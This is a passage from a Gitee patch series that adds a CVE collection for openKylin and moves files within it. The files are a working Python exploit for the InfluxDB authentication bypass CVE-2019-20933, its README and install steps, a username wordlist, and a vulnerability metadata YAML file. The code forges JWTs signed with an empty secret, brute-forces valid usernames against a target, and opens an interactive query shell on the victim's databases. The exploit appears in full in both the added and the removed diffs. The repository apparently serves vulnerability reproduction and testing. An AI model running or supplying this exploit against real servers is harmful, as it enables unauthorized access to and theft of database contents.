"yellow"))) + except KeyboardInterrupt: + print() + print("~ Bye!") + break + + try: + db = dblist[int(db) - 1] + except IndexError as e: + # Prompt again if database index if not in range + continue + except Exception as e: + # Check if database exists if its a string + if db.strip() == "": + continue + if db not in dblist: + print(colored("[Error] ", "red") + "No such database: \"" + colored(db, "yellow") + "\"") + continue + pass + + if db in ['.exit', '.quit', '.back']: + return + if db == "": + continue + + print() + print("Starting InfluxDB shell - .back to go back") + while True: + try: + query = input("[{}@{}/{}] $ ".format(colored(username, "red"), colored(host, "yellow"), colored(db, "blue"))) + except KeyboardInterrupt: + break + + if query.strip() == "": + continue + + if query in ['.exit', '.quit', '.back']: + break + + response = makeQuery(token, db, host, port, query) + response = json.loads(response) + print(json.dumps(response, indent=4, sort_keys=True)) + + +if __name__ == '__main__': + print(colored(""" + _____ __ _ _____ ____ ______ _ _ _ + |_ _| / _| | | __ \| _ \ | ____| | | (_) | + | | _ __ | |_| |_ ___ __ | | | |_) | | |__ __ ___ __ | | ___ _| |_ + | | | '_ \| _| | | | \ \/ / | | | _ < | __| \ \/ / '_ \| |/ _ \| | __| + _| |_| | | | | | | |_| |> <| |__| | |_) | | |____ > <| |_) | | (_) | | |_ + |_____|_| |_|_| |_|\__,_/_/\_\_____/|____/ |______/_/\_\ .__/|_|\___/|_|\__| + | | + |_| """, 'green')) + print(colored(" - using CVE-2019-20933", "yellow")) + + exploit() diff --git a/cve/InfluxDB/2019/CVE-2019-20933/requirements.txt b/cve/InfluxDB/2019/CVE-2019-20933/requirements.txt new file mode 100644 index 00000000..a345330c --- /dev/null +++ b/cve/InfluxDB/2019/CVE-2019-20933/requirements.txt @@ -0,0 +1,4 @@ +urllib3 +requests +PyJWT +termcolor diff --git a/cve/InfluxDB/2019/CVE-2019-20933/users.txt b/cve/InfluxDB/2019/CVE-2019-20933/users.txt new file mode 100644 index 00000000..802b77da --- /dev/null +++ b/cve/InfluxDB/2019/CVE-2019-20933/users.txt @@ -0,0 +1,7 @@ +admin +user +root +database +db +influx +influxdb -- Gitee From ef22a232a370d3afb851359becd2d07cfe03eab1 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 05:48:23 +0000 Subject: [PATCH 31/40] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/InfluxDB/2019/CVE-2019-20933/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/InfluxDB/2019/CVE-2019-20933/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/InfluxDB/2019/CVE-2019-20933/.keep diff --git a/cve/InfluxDB/2019/CVE-2019-20933/.keep b/cve/InfluxDB/2019/CVE-2019-20933/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 3078f993033137496000713d6fa5deb2c5a28cee Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 05:48:29 +0000 Subject: [PATCH 32/40] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/InfluxDB/2019/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/InfluxDB/2019/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/InfluxDB/2019/.keep diff --git a/cve/InfluxDB/2019/.keep b/cve/InfluxDB/2019/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 6144a6a9367bcd70ff0dec12becb2023654ebcb6 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 05:49:05 +0000 Subject: [PATCH 33/40] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/InfluxDB/2019/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/InfluxDB/2019/yaml/.keep diff --git a/cve/InfluxDB/2019/yaml/.keep b/cve/InfluxDB/2019/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From b19aedfbcbcb0cc7ce8d4d3c63fc719473fdd368 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 05:49:27 +0000 Subject: [PATCH 34/40] CVE-2019-20933 yaml Signed-off-by: Zentung0628 --- cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml diff --git a/cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml b/cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml new file mode 100644 index 00000000..6a0ff454 --- /dev/null +++ b/cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml @@ -0,0 +1,19 @@ +id: CVE-2019-20933 +source: https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933 +info: + name: InfluxDB 1.7.6之前版本中的services/httpd/handler.go中的authenticate函数存在认证绕过漏洞。该漏洞源于JWT令牌可能具有空SharedSecret。攻击者可利用该漏洞绕过认证。 + severity: critical + description: | + InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret). + scope-of-influence: + InfluxData InfluxDB <1.7.6 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-20933 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-20933 + cwe-id: CWE-287 + cnvd-id: CNVD-2022-06547 + kve-id: None + tags: RCE, cve2019, 任意文件读取 \ No newline at end of file -- Gitee From eadacbf6148d72b6b19c808bac0cde63505c6802 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 05:49:31 +0000 Subject: [PATCH 35/40] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/InfluxDB/2019/yaml/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/InfluxDB/2019/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/InfluxDB/2019/yaml/.keep diff --git a/cve/InfluxDB/2019/yaml/.keep b/cve/InfluxDB/2019/yaml/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From e4427ab07a1fa9ef0a4b92a0603db4fcbab06b3c Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 05:49:49 +0000 Subject: [PATCH 36/40] update cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml. Signed-off-by: Zentung0628 --- cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml b/cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml index 6a0ff454..7902e771 100644 --- a/cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml +++ b/cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml @@ -6,7 +6,7 @@ info: description: | InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret). scope-of-influence: - InfluxData InfluxDB <1.7.6 + InfluxData InfluxDB <1.7.6 reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-20933 classification: -- Gitee From 4718da04a29b95aeb86cdf817f25c0923725fcd5 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 05:49:58 +0000 Subject: [PATCH 37/40] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/InfluxDB/CVE-2019-20933?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/InfluxDB/CVE-2019-20933/README.md | 16 -- cve/InfluxDB/CVE-2019-20933/__main__.py | 185 ------------------- cve/InfluxDB/CVE-2019-20933/requirements.txt | 4 - cve/InfluxDB/CVE-2019-20933/users.txt | 7 - 4 files changed, 212 deletions(-) delete mode 100644 cve/InfluxDB/CVE-2019-20933/README.md delete mode 100644 cve/InfluxDB/CVE-2019-20933/__main__.py delete mode 100644 cve/InfluxDB/CVE-2019-20933/requirements.txt delete mode 100644 cve/InfluxDB/CVE-2019-20933/users.txt diff --git a/cve/InfluxDB/CVE-2019-20933/README.md b/cve/InfluxDB/CVE-2019-20933/README.md deleted file mode 100644 index dad0665f..00000000 --- a/cve/InfluxDB/CVE-2019-20933/README.md +++ /dev/null @@ -1,16 +0,0 @@ -# InfluxDB Exploit CVE-2019-20933 - -Exploit for InfluxDB CVE-2019-20933 vulnerability, InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret). -Exploit check if server is vulnerable, then it tries to get a remote query shell. It has built in a username bruteforce service. - -## Installation -``` -git clone https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933.git -cd InfluxDB-Exploit-CVE-2019-20933 -pip install -r requirements.txt -``` - -## Usage -``` -python __main__.py -``` diff --git a/cve/InfluxDB/CVE-2019-20933/__main__.py b/cve/InfluxDB/CVE-2019-20933/__main__.py deleted file mode 100644 index e38d12f4..00000000 --- a/cve/InfluxDB/CVE-2019-20933/__main__.py +++ /dev/null @@ -1,185 +0,0 @@ -#!/bin/env python - -import json -import pathlib -import time -import urllib -import requests as requests -import jwt -from termcolor import colored - -def bruteforceUser(filename, host, port): - print() - print("Bruteforcing usernames ...") - with open(filename) as f: - for line in f: - line = line.replace("\n", "") - exp = int(time.time()) - exp = exp + 2.628 * 10 ** 6 - # Generation JWT - payload = { - "username": line, - "exp": exp - } - - token = jwt.encode(payload, "", algorithm="HS256") - query = "SHOW DATABASES" - response = makeQuery(token, 'dummy', host, port, query) - response = json.loads(response) - if "error" in response.keys(): - if "signature is invalid" in response['error']: - print(colored("ERROR: Host not vulnerable !!!", "red")) - print(colored("ERROR: " + response['error'] + "", "red")) - exit(1) - if "user not found" in response['error']: - print("[{}] {}".format(colored("x", "red"), line)) - else: - print("[{}] {}".format(colored("v", "green"), line)) - print() - username = line - return username - - print(colored("ERROR: no valid username found !!!", "red")) - exit(1) - -def makeQuery(token, db, host, port, query): - try: - headers = { - 'Authorization': 'Bearer ' + token, - } - except: - token = token.decode("utf-8") - headers = { - 'Authorization': 'Bearer ' + token, - } - - # Send request - query = urllib.parse.quote_plus(query) - response = requests.get('http://' + host + ':' + str(port) + '/query?db=' + db + '&q=' + query, headers=headers) - return response.text - -def exploit(): - # imput data - print() - try: - host = input("Host (default: localhost): ") - except KeyboardInterrupt: - return - - if host == "": - host = "127.0.0.1" - - try: - port = input("Port (default: 8086): ") - except KeyboardInterrupt: - return - if port == "": - port = 8086 - - try: - username = input("Username path to username file (default: users.txt): ") - except KeyboardInterrupt: - return - - if username == "": - username = "users.txt" - - # check if username is a valid file to start bruteforce - file = pathlib.Path(username) - if file.exists(): - username = bruteforceUser(username, host, port) - - exp = int(time.time()) - exp = exp + 2.628 * 10 ** 6 # Aggiungo un mese - - # Generation JWT - payload = { - "username": username, - "exp": exp - } - - token = jwt.encode(payload, "", algorithm="HS256") - #print("Token: {}".format(token)) - query = "SHOW DATABASES" - response = makeQuery(token, 'dummy', host, port, query) - response = json.loads(response) - - if "results" in response.keys(): - print(colored("Host vulnerable !!!", "green")) - else: - print(colored("ERROR: Host not vulnerable !!!", "red")) - print(colored("ERROR: "+response['error']+"", "red")) - return - - # Get databases list - dblist = [db[0] for db in response['results'][0]['series'][0]['values']] - - while True: - print() - print("Databases:") - print() - for (i, db) in enumerate(dblist): - print("{}) {}".format(i + 1, db)) - - print() - print(".quit to exit") - - - try: - db = input("[{}@{}] Database: ".format(colored(username, "red"), colored(host, "yellow"))) - except KeyboardInterrupt: - print() - print("~ Bye!") - break - - try: - db = dblist[int(db) - 1] - except IndexError as e: - # Prompt again if database index if not in range - continue - except Exception as e: - # Check if database exists if its a string - if db.strip() == "": - continue - if db not in dblist: - print(colored("[Error] ", "red") + "No such database: \"" + colored(db, "yellow") + "\"") - continue - pass - - if db in ['.exit', '.quit', '.back']: - return - if db == "": - continue - - print() - print("Starting InfluxDB shell - .back to go back") - while True: - try: - query = input("[{}@{}/{}] $ ".format(colored(username, "red"), colored(host, "yellow"), colored(db, "blue"))) - except KeyboardInterrupt: - break - - if query.strip() == "": - continue - - if query in ['.exit', '.quit', '.back']: - break - - response = makeQuery(token, db, host, port, query) - response = json.loads(response) - print(json.dumps(response, indent=4, sort_keys=True)) - - -if __name__ == '__main__': - print(colored(""" - _____ __ _ _____ ____ ______ _ _ _ - |_ _| / _| | | __ \| _ \ | ____| | | (_) | - | | _ __ | |_| |_ ___ __ | | | |_) | | |__ __ ___ __ | | ___ _| |_ - | | | '_ \| _| | | | \ \/ / | | | _ < | __| \ \/ / '_ \| |/ _ \| | __| - _| |_| | | | | | | |_| |> <| |__| | |_) | | |____ > <| |_) | | (_) | | |_ - |_____|_| |_|_| |_|\__,_/_/\_\_____/|____/ |______/_/\_\ .__/|_|\___/|_|\__| - | | - |_| """, 'green')) - print(colored(" - using CVE-2019-20933", "yellow")) - - exploit() diff --git a/cve/InfluxDB/CVE-2019-20933/requirements.txt b/cve/InfluxDB/CVE-2019-20933/requirements.txt deleted file mode 100644 index a345330c..00000000 --- a/cve/InfluxDB/CVE-2019-20933/requirements.txt +++ /dev/null @@ -1,4 +0,0 @@ -urllib3 -requests -PyJWT -termcolor diff --git a/cve/InfluxDB/CVE-2019-20933/users.txt b/cve/InfluxDB/CVE-2019-20933/users.txt deleted file mode 100644 index 802b77da..00000000 --- a/cve/InfluxDB/CVE-2019-20933/users.txt +++ /dev/null @@ -1,7 +0,0 @@ -admin -user -root -database -db -influx -influxdb -- Gitee From 1593a0b1b81b6b1e6b6f725ce5470b51272216a3 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 05:50:03 +0000 Subject: [PATCH 38/40] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/InfluxDB/yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/InfluxDB/yaml/CVE-2019-20933.yaml | 19 ------------------- 1 file changed, 19 deletions(-) delete mode 100644 cve/InfluxDB/yaml/CVE-2019-20933.yaml diff --git a/cve/InfluxDB/yaml/CVE-2019-20933.yaml b/cve/InfluxDB/yaml/CVE-2019-20933.yaml deleted file mode 100644 index 7902e771..00000000 --- a/cve/InfluxDB/yaml/CVE-2019-20933.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: CVE-2019-20933 -source: https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933 -info: - name: InfluxDB 1.7.6之前版本中的services/httpd/handler.go中的authenticate函数存在认证绕过漏洞。该漏洞源于JWT令牌可能具有空SharedSecret。攻击者可利用该漏洞绕过认证。 - severity: critical - description: | - InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret). - scope-of-influence: - InfluxData InfluxDB <1.7.6 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2019-20933 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2019-20933 - cwe-id: CWE-287 - cnvd-id: CNVD-2022-06547 - kve-id: None - tags: RCE, cve2019, 任意文件读取 \ No newline at end of file -- Gitee From 78964b9549cbc9266c102aee20fb7dedcdaaa796 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 05:54:17 +0000 Subject: [PATCH 39/40] update oslist.yaml Signed-off-by: Zentung0628 --- openkylin_list.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 127b8584..023c281e 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -17,6 +17,8 @@ cve: - CVE-2022-33891 apache-tomcat: - CVE-2020-13935 + Influx-DB: + - CVE-2019-20933 linux-kernel: - CVE-2021-4204 - CVE-2021-22555 -- Gitee From 84451f8437596455bfa5366342d389d55df96538 Mon Sep 17 00:00:00 2001 From: Zentung0628 Date: Wed, 15 Mar 2023 07:04:18 +0000 Subject: [PATCH 40/40] update cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml. Signed-off-by: Zentung0628 --- cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml b/cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml index 7902e771..eaf35209 100644 --- a/cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml +++ b/cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml @@ -16,4 +16,4 @@ info: cwe-id: CWE-287 cnvd-id: CNVD-2022-06547 kve-id: None - tags: RCE, cve2019, 任意文件读取 \ No newline at end of file + tags: RCE, cve2019, 认证机制不恰当 \ No newline at end of file -- Gitee